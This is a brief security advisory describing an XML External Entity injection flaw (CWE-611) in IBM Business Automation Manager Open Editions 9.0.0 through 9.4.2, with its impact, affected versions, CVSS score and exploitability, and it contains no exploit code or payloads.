Impact
IBM Business Automation Manager Open Editions versions 9.0.0 through 9.4.2 can process XML data containing external entity references, a flaw classified as XML External Entity Injection, or CWE-611. When a malicious XML document is submitted, an attacker can force the server to request arbitrary files or URLs, thereby exposing sensitive data or consuming significant memory resources. The consequence is that confidential information may be disclosed and the system may become unresponsive due to high resource consumption.
Affected Systems
The vulnerability affects IBM Business Automation Manager Open Editions. All deployments of the product in the 9.0.0 through 9.4.2 release series are susceptible.
Risk and Exploitability
The CVSS score for this issue is 7.6, indicating a high severity. EPSS data is not available, but the issue is not listed in the CISA KEV catalog. The attack vector is presumed to be remote, requiring an attacker to deliver a crafted XML payload to a processing endpoint. If the application accepts untrusted XML input over a network interface, an adversary could exploit the flaw to read arbitrary files or URLs and to exhaust memory, potentially leading to denial of service. The overall risk is elevated because any accessible XML service in the affected product could be targeted.
OpenCVE Enrichment